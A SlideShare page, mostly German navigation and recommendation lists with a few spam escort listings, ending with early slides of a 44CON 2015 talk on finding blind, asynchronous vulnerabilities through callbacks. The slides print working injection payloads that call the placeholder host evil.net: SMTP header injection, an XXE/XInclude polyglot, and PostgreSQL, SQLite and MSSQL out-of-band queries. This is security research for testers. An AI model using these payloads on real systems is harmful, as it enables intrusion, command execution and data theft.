Suche senden
Hochladen
44CON London 2015 - Hunting Asynchronous Vulnerabilities
•
3 gefällt mir
•
949 views
44CON
Folgen
Hunting Asynchronous Vulnerabilities by James Kettle
Weniger lesen
Mehr lesen
Technologie
Melden
Teilen
Melden
Teilen
1 von 31
Jetzt herunterladen
Downloaden Sie, um offline zu lesen
Empfohlen
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON
44CON London 2015 - Is there an EFI monster inside your apple?
44CON London 2015 - Is there an EFI monster inside your apple?
44CON
44CON London 2015 - reverse reverse engineering
44CON London 2015 - reverse reverse engineering
44CON
How to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ Disobey
Zoltan Balazs
Macdoored
Macdoored
Shakacon
Cloud forensics putting the bits back together
Cloud forensics putting the bits back together
Shakacon
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
Zoltan Balazs
Empfohlen
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON
44CON London 2015 - Is there an EFI monster inside your apple?
44CON London 2015 - Is there an EFI monster inside your apple?
44CON
44CON London 2015 - reverse reverse engineering
44CON London 2015 - reverse reverse engineering
44CON
How to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ Disobey
Zoltan Balazs
Macdoored
Macdoored
Shakacon
Cloud forensics putting the bits back together
Cloud forensics putting the bits back together
Shakacon
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
Zoltan Balazs
I can be apple and so can you
I can be apple and so can you
Shakacon
Web (dis)assembly
Web (dis)assembly
Shakacon
Oversight: Exposing spies on macOS
Oversight: Exposing spies on macOS
Shakacon
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
Zoltan Balazs
BSides Edinburgh 2017 - TR-06FAIL and other CPE Configuration Disasters
BSides Edinburgh 2017 - TR-06FAIL and other CPE Configuration Disasters
infodox
44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software
44CON
Steelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trash
infodox
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Saumil Shah
Pwned in Translation - from Subtitles to RCE
Pwned in Translation - from Subtitles to RCE
Shakacon
Explain Ethereum smart contract hacking like i am a five
Explain Ethereum smart contract hacking like i am a five
Zoltan Balazs
Cloud Device Insecurity
Cloud Device Insecurity
Jeremy Brown
Root via SMS: 4G access level security assessment, Sergey Gordeychik, Alexand...
Root via SMS: 4G access level security assessment, Sergey Gordeychik, Alexand...
Sergey Gordeychik
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit Framework
Chris Gates
0day hunting a.k.a. The story of a proper CPE test
0day hunting a.k.a. The story of a proper CPE test
Balazs Bucsay
Digging for Android Kernel Bugs
Digging for Android Kernel Bugs
Jiahong Fang
Denis Baranov: Root via XSS
Denis Baranov: Root via XSS
qqlan
Nginx warhead
Nginx warhead
Sergey Belov
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Rob Fuller
Unsecuring SSH
Unsecuring SSH
Jeremy Brown
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...
Positive Hack Days
44CON 2014 - Security Analytics Beyond Cyber, Phil Huggins
44CON 2014 - Security Analytics Beyond Cyber, Phil Huggins
44CON
44CON 2013 - .Net Havoc - Manipulating Properties of Dormant Server Side Web ...
44CON 2013 - .Net Havoc - Manipulating Properties of Dormant Server Side Web ...
44CON
Weitere ähnliche Inhalte
Was ist angesagt?
I can be apple and so can you
I can be apple and so can you
Shakacon
Web (dis)assembly
Web (dis)assembly
Shakacon
Oversight: Exposing spies on macOS
Oversight: Exposing spies on macOS
Shakacon
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
Zoltan Balazs
BSides Edinburgh 2017 - TR-06FAIL and other CPE Configuration Disasters
BSides Edinburgh 2017 - TR-06FAIL and other CPE Configuration Disasters
infodox
44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software
44CON
Steelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trash
infodox
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Saumil Shah
Pwned in Translation - from Subtitles to RCE
Pwned in Translation - from Subtitles to RCE
Shakacon
Explain Ethereum smart contract hacking like i am a five
Explain Ethereum smart contract hacking like i am a five
Zoltan Balazs
Cloud Device Insecurity
Cloud Device Insecurity
Jeremy Brown
Root via SMS: 4G access level security assessment, Sergey Gordeychik, Alexand...
Root via SMS: 4G access level security assessment, Sergey Gordeychik, Alexand...
Sergey Gordeychik
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit Framework
Chris Gates
0day hunting a.k.a. The story of a proper CPE test
0day hunting a.k.a. The story of a proper CPE test
Balazs Bucsay
Digging for Android Kernel Bugs
Digging for Android Kernel Bugs
Jiahong Fang
Denis Baranov: Root via XSS
Denis Baranov: Root via XSS
qqlan
Nginx warhead
Nginx warhead
Sergey Belov
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Rob Fuller
Unsecuring SSH
Unsecuring SSH
Jeremy Brown
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...
Positive Hack Days
Was ist angesagt?
(20)
I can be apple and so can you
I can be apple and so can you
Web (dis)assembly
Web (dis)assembly
Oversight: Exposing spies on macOS
Oversight: Exposing spies on macOS
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
BSides Edinburgh 2017 - TR-06FAIL and other CPE Configuration Disasters
BSides Edinburgh 2017 - TR-06FAIL and other CPE Configuration Disasters
44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software
Steelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trash
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
Pwned in Translation - from Subtitles to RCE
Pwned in Translation - from Subtitles to RCE
Explain Ethereum smart contract hacking like i am a five
Explain Ethereum smart contract hacking like i am a five
Cloud Device Insecurity
Cloud Device Insecurity
Root via SMS: 4G access level security assessment, Sergey Gordeychik, Alexand...
Root via SMS: 4G access level security assessment, Sergey Gordeychik, Alexand...
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit Framework
0day hunting a.k.a. The story of a proper CPE test
0day hunting a.k.a. The story of a proper CPE test
Digging for Android Kernel Bugs
Digging for Android Kernel Bugs
Denis Baranov: Root via XSS
Denis Baranov: Root via XSS
Nginx warhead
Nginx warhead
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Unsecuring SSH
Unsecuring SSH
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...
Andere mochten auch
44CON 2014 - Security Analytics Beyond Cyber, Phil Huggins
44CON 2014 - Security Analytics Beyond Cyber, Phil Huggins
44CON
44CON 2013 - .Net Havoc - Manipulating Properties of Dormant Server Side Web ...
44CON 2013 - .Net Havoc - Manipulating Properties of Dormant Server Side Web ...
44CON
44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?
44CON
44CON 2104 - Lessons Learned from Black Hat's Infrastructure, Conan Dooley
44CON 2104 - Lessons Learned from Black Hat's Infrastructure, Conan Dooley
44CON
44CON 2014 - Researching Android Device Security with the Help of a Droid Arm...
44CON 2014 - Researching Android Device Security with the Help of a Droid Arm...
44CON
44CON 2014 - Flushing Away Preconceptions of Risk, Thom Langford
44CON 2014 - Flushing Away Preconceptions of Risk, Thom Langford
44CON
44CON London 2015 - Reverse engineering and exploiting font rasterizers: the ...
44CON London 2015 - Reverse engineering and exploiting font rasterizers: the ...
44CON
44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
44CON
44CON 2014 - Advanced Excel Hacking, Didier Stevens
44CON 2014 - Advanced Excel Hacking, Didier Stevens
44CON
44CON 2014 - Switches Get Stitches, Eireann Leverett & Matt Erasmus
44CON 2014 - Switches Get Stitches, Eireann Leverett & Matt Erasmus
44CON
44CON London 2015 - Playing with Fire: Attacking the FireEye MPS
44CON London 2015 - Playing with Fire: Attacking the FireEye MPS
44CON
44CON 2014 - Simple Hardware Sidechannel Attacks for 10 GBP or Less, Joe Fitz...
44CON 2014 - Simple Hardware Sidechannel Attacks for 10 GBP or Less, Joe Fitz...
44CON
44CON 2014 - I gave a talk about robots and hardware!, Josh Thomas
44CON 2014 - I gave a talk about robots and hardware!, Josh Thomas
44CON
44CON London 2015 - Inside Terracotta VPN
44CON London 2015 - Inside Terracotta VPN
44CON
44CON 2014 - GreedyBTS: Hacking Adventures in GSM, Hacker Fantastic
44CON 2014 - GreedyBTS: Hacking Adventures in GSM, Hacker Fantastic
44CON
44CON London 2015 - Smart Muttering; a story and toolset for smart meter plat...
44CON London 2015 - Smart Muttering; a story and toolset for smart meter plat...
44CON
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON
44CON 2014 - Binary Protocol Analysis with CANAPE, James Forshaw
44CON 2014 - Binary Protocol Analysis with CANAPE, James Forshaw
44CON
44CON London - Attacking VxWorks: from Stone Age to Interstellar
44CON London - Attacking VxWorks: from Stone Age to Interstellar
44CON
44CON London 2015 - Windows 10: 2 Steps Forward, 1 Step Back
44CON London 2015 - Windows 10: 2 Steps Forward, 1 Step Back
44CON
Andere mochten auch
(20)
44CON 2014 - Security Analytics Beyond Cyber, Phil Huggins
44CON 2014 - Security Analytics Beyond Cyber, Phil Huggins
44CON 2013 - .Net Havoc - Manipulating Properties of Dormant Server Side Web ...
44CON 2013 - .Net Havoc - Manipulating Properties of Dormant Server Side Web ...
44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?
44CON 2104 - Lessons Learned from Black Hat's Infrastructure, Conan Dooley
44CON 2104 - Lessons Learned from Black Hat's Infrastructure, Conan Dooley
44CON 2014 - Researching Android Device Security with the Help of a Droid Arm...
44CON 2014 - Researching Android Device Security with the Help of a Droid Arm...
44CON 2014 - Flushing Away Preconceptions of Risk, Thom Langford
44CON 2014 - Flushing Away Preconceptions of Risk, Thom Langford
44CON London 2015 - Reverse engineering and exploiting font rasterizers: the ...
44CON London 2015 - Reverse engineering and exploiting font rasterizers: the ...
44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
44CON 2014 - Advanced Excel Hacking, Didier Stevens
44CON 2014 - Advanced Excel Hacking, Didier Stevens
44CON 2014 - Switches Get Stitches, Eireann Leverett & Matt Erasmus
44CON 2014 - Switches Get Stitches, Eireann Leverett & Matt Erasmus
44CON London 2015 - Playing with Fire: Attacking the FireEye MPS
44CON London 2015 - Playing with Fire: Attacking the FireEye MPS
44CON 2014 - Simple Hardware Sidechannel Attacks for 10 GBP or Less, Joe Fitz...
44CON 2014 - Simple Hardware Sidechannel Attacks for 10 GBP or Less, Joe Fitz...
44CON 2014 - I gave a talk about robots and hardware!, Josh Thomas
44CON 2014 - I gave a talk about robots and hardware!, Josh Thomas
44CON London 2015 - Inside Terracotta VPN
44CON London 2015 - Inside Terracotta VPN
44CON 2014 - GreedyBTS: Hacking Adventures in GSM, Hacker Fantastic
44CON 2014 - GreedyBTS: Hacking Adventures in GSM, Hacker Fantastic
44CON London 2015 - Smart Muttering; a story and toolset for smart meter plat...
44CON London 2015 - Smart Muttering; a story and toolset for smart meter plat...
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Binary Protocol Analysis with CANAPE, James Forshaw
44CON 2014 - Binary Protocol Analysis with CANAPE, James Forshaw
44CON London - Attacking VxWorks: from Stone Age to Interstellar
44CON London - Attacking VxWorks: from Stone Age to Interstellar
44CON London 2015 - Windows 10: 2 Steps Forward, 1 Step Back
44CON London 2015 - Windows 10: 2 Steps Forward, 1 Step Back
Ähnlich wie 44CON London 2015 - Hunting Asynchronous Vulnerabilities
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
Hackito Ergo Sum
Inside Of Mbga Open Platform
Inside Of Mbga Open Platform
Hideo Kimura
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
Felipe Prado
NetDevOps Developer Environments with Vagrant @ SCALE16x
NetDevOps Developer Environments with Vagrant @ SCALE16x
Hank Preston
Malware Analysis For The Enterprise
Malware Analysis For The Enterprise
Jason Ross
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
Felipe Prado
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
EC-Council
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016
Xavier Ashe
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
lior mazor
The top 10 security issues in web applications
The top 10 security issues in web applications
Devnology
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
George Boobyer
How to secure your web applications with NGINX
How to secure your web applications with NGINX
Wallarm
VUG5: Varnish at Opera Software
VUG5: Varnish at Opera Software
Cosimo Streppone
Integrating multiple CDN providers at Etsy - Velocity Europe (London) 2013
Integrating multiple CDN providers at Etsy - Velocity Europe (London) 2013
Marcus Barczak
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
Chris Gates
Power of linked list
Power of linked list
Peter Hlavaty
Ci for i-os-codemash-01.2013
Ci for i-os-codemash-01.2013
Kevin Munc
What we Learned Implementing Puppet at Backstop
What we Learned Implementing Puppet at Backstop
Puppet
Ntxissacsc5 red 1 & 2 basic hacking tools ncc group
Ntxissacsc5 red 1 & 2 basic hacking tools ncc group
North Texas Chapter of the ISSA
리눅스 드라이버 실습 #3
리눅스 드라이버 실습 #3
Sangho Park
Ähnlich wie 44CON London 2015 - Hunting Asynchronous Vulnerabilities
(20)
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
Inside Of Mbga Open Platform
Inside Of Mbga Open Platform
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
NetDevOps Developer Environments with Vagrant @ SCALE16x
NetDevOps Developer Environments with Vagrant @ SCALE16x
Malware Analysis For The Enterprise
Malware Analysis For The Enterprise
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The top 10 security issues in web applications
The top 10 security issues in web applications
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
How to secure your web applications with NGINX
How to secure your web applications with NGINX
VUG5: Varnish at Opera Software
VUG5: Varnish at Opera Software
Integrating multiple CDN providers at Etsy - Velocity Europe (London) 2013
Integrating multiple CDN providers at Etsy - Velocity Europe (London) 2013
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
Power of linked list
Power of linked list
Ci for i-os-codemash-01.2013
Ci for i-os-codemash-01.2013
What we Learned Implementing Puppet at Backstop
What we Learned Implementing Puppet at Backstop
Ntxissacsc5 red 1 & 2 basic hacking tools ncc group
Ntxissacsc5 red 1 & 2 basic hacking tools ncc group
리눅스 드라이버 실습 #3
리눅스 드라이버 실습 #3
Mehr von 44CON
They're All Scorpions - Successful SecOps in a Hostile Workplace - Pete Herzo...
They're All Scorpions - Successful SecOps in a Hostile Workplace - Pete Herzo...
44CON
How to Explain Post-Quantum Cryptography to a Middle School Student - Klaus S...
How to Explain Post-Quantum Cryptography to a Middle School Student - Klaus S...
44CON
Using SmartNICs to Provide Better Data Center Security - Jack Matheson - 44CO...
Using SmartNICs to Provide Better Data Center Security - Jack Matheson - 44CO...
44CON
JARVIS never saw it coming: Hacking machine learning (ML) in speech, text and...
JARVIS never saw it coming: Hacking machine learning (ML) in speech, text and...
44CON
Reverse Engineering and Bug Hunting on KMDF Drivers - Enrique Nissim - 44CON ...
Reverse Engineering and Bug Hunting on KMDF Drivers - Enrique Nissim - 44CON ...
44CON
The UK's Code of Practice for Security in Consumer IoT Products and Services ...
The UK's Code of Practice for Security in Consumer IoT Products and Services ...
44CON
Weak analogies make poor realities – are we sitting on a Security Debt Crisis...
Weak analogies make poor realities – are we sitting on a Security Debt Crisis...
44CON
Pwning the 44CON Nerf Tank
Pwning the 44CON Nerf Tank
44CON
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...
44CON
44CON London 2015 - Indicators of Compromise: From malware analysis to eradic...
44CON London 2015 - Indicators of Compromise: From malware analysis to eradic...
44CON
44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy
44CON
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON
44CON London 2015 - Going AUTH the Rails on a Crazy Train
44CON London 2015 - Going AUTH the Rails on a Crazy Train
44CON
44CON London 2015 - Software Defined Networking (SDN) Security
44CON London 2015 - Software Defined Networking (SDN) Security
44CON
44CON London 2015 - DDoS mitigation EPIC FAIL collection
44CON London 2015 - DDoS mitigation EPIC FAIL collection
44CON
44CON London 2015 - Old Dog, New Tricks: Forensics With PowerShell
44CON London 2015 - Old Dog, New Tricks: Forensics With PowerShell
44CON
Mehr von 44CON
(16)
They're All Scorpions - Successful SecOps in a Hostile Workplace - Pete Herzo...
They're All Scorpions - Successful SecOps in a Hostile Workplace - Pete Herzo...
How to Explain Post-Quantum Cryptography to a Middle School Student - Klaus S...
How to Explain Post-Quantum Cryptography to a Middle School Student - Klaus S...
Using SmartNICs to Provide Better Data Center Security - Jack Matheson - 44CO...
Using SmartNICs to Provide Better Data Center Security - Jack Matheson - 44CO...
JARVIS never saw it coming: Hacking machine learning (ML) in speech, text and...
JARVIS never saw it coming: Hacking machine learning (ML) in speech, text and...
Reverse Engineering and Bug Hunting on KMDF Drivers - Enrique Nissim - 44CON ...
Reverse Engineering and Bug Hunting on KMDF Drivers - Enrique Nissim - 44CON ...
The UK's Code of Practice for Security in Consumer IoT Products and Services ...
The UK's Code of Practice for Security in Consumer IoT Products and Services ...
Weak analogies make poor realities – are we sitting on a Security Debt Crisis...
Weak analogies make poor realities – are we sitting on a Security Debt Crisis...
Pwning the 44CON Nerf Tank
Pwning the 44CON Nerf Tank
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...
44CON London 2015 - Indicators of Compromise: From malware analysis to eradic...
44CON London 2015 - Indicators of Compromise: From malware analysis to eradic...
44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - Going AUTH the Rails on a Crazy Train
44CON London 2015 - Going AUTH the Rails on a Crazy Train
44CON London 2015 - Software Defined Networking (SDN) Security
44CON London 2015 - Software Defined Networking (SDN) Security
44CON London 2015 - DDoS mitigation EPIC FAIL collection
44CON London 2015 - DDoS mitigation EPIC FAIL collection
44CON London 2015 - Old Dog, New Tricks: Forensics With PowerShell
44CON London 2015 - Old Dog, New Tricks: Forensics With PowerShell
Kürzlich hochgeladen
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Delhi Call girls
How to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
naman860154
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
Michael W. Hawkins
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
Malak Abu Hammad
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
Paola De la Torre
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
giselly40
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
Anna Loughnan Colquhoun
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
hans926745
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
Slack Application Development 101 Slides
Slack Application Development 101 Slides
praypatel2
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Igalia
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
apidays
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Enterprise Knowledge
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
gurkirankumar98700
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Neo4j
Kürzlich hochgeladen
(20)
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
How to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
Slack Application Development 101 Slides
Slack Application Development 101 Slides
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
44CON London 2015 - Hunting Asynchronous Vulnerabilities
1.
HUNTING ASYNCHRONOUS VULNERABILITIES James
Kettle
2.
©PortSwigger Ltd
2015 All Rights Reserved From: no-‐reply@redacted.com To: James Kettle Subject: Order: 103092185 Hi test, Thank you for your recent order… Description Quantity Price VAT Total Leather Jacket 1 £824.33 £164.87 £989.20 THE CLASSICAL CALLBACK
3.
©PortSwigger Ltd
2015 All Rights Reserved OVERVIEW •The asynchronous problem •Callback oriented hacking • Direct -‐ XML/SQL • Chained -‐ SQL • Destructive -‐ SQL • Polyglot -‐ OS/XSS • Interactive • Hazards • Q&A
4.
©PortSwigger Ltd
2015 All Rights Reserved THE ASYNCHRONOUS PROBLEM •Many asynchronous vulnerabilities are invisible Visible errors Result output Time side-‐channel ✘ ✘ ✘
5.
©PortSwigger Ltd
2015 All Rights Reserved •Blind + background thread •Nightly cronjob •Blind + event-‐triggered •Second order SQLi, command injection… •Blind XSS •Blind + no time delay •Blind XXE, XPath… THE ASYNCHRONOUS PROBLEM
6.
©PortSwigger Ltd
2015 All Rights Reserved THE ASYNCHRONOUS SOLUTION •Callbacks! •Why DNS? • Rarely filtered outbound • Underpins most network protocols
7.
PAYLOAD DEVELOPMENT
8.
©PortSwigger Ltd
2015 All Rights Reserved THE INDOMITABLE PAYLOAD •Callback exploits fail hard •Quality of Payload is crucial •Environment-‐insensitive •Multi context (aka “polyglot”) •Filter-‐resistant •Simple.
9.
©PortSwigger Ltd
2015 All Rights Reserved SMTP HEADER INJECTION foo%0ABCC: hacker@evil.net Website Attacker User
10.
©PortSwigger Ltd
2015 All Rights Reserved SMTP HEADER INJECTION %0AReply-‐To: hacker@evil.net%0A%0A<zip_bomb> Website Attacker User
11.
©PortSwigger Ltd
2015 All Rights Reserved <?xml version="1.0" encoding="utf-8"?> <?xml-stylesheet type="text/xml" href="http://xsl.evil.net/a.xsl"?> <!DOCTYPE root PUBLIC "-//A/B/EN" http://dtd.evil.net/a.dtd [ <!ENTITY % remote SYSTEM "http://xxe2.evil.net/a"> <!ENTITY xxe SYSTEM "http://xxe1.evil.net/a"> %remote; ]> <root> <foo>&xxe;</foo> <x xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://xi.evil.net/" ></x> <y xmlns=http://a.b/ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://schemalocation.evil.net/a.xsd">a</y> </root>
12.
©PortSwigger Ltd
2015 All Rights Reserved SQLi: POSTGRES copy (select '') to program 'nslookup evil.net'
13.
©PortSwigger Ltd
2015 All Rights Reserved SQLi: SQLITE3 • ;attach database '//evil.net/z' as 'z'-- - • Windows only • Requires batched queries • Can also be used to create files • (SELECT load_extension('//foo')) • Windows only • Frequently disabled • By @0x7674
14.
©PortSwigger Ltd
2015 All Rights Reserved SQLi: MSSQL SELECT * FROM openrowset('SQLNCLI', 'evil.net';'a', 'select 1 from dual'); • Requires 'ad hoc distributed queries' EXEC master.dbo.xp_fileexist 'evil.netfoo' • Requires sysadmin privs BULK INSERT mytable FROM 'evil.net$file'; • Requires bulk insert privs EXEC master.dbo.xp_dirtree 'evil.netfoo' • Checks privileges after DNS lookup
15.
©PortSwigger Ltd
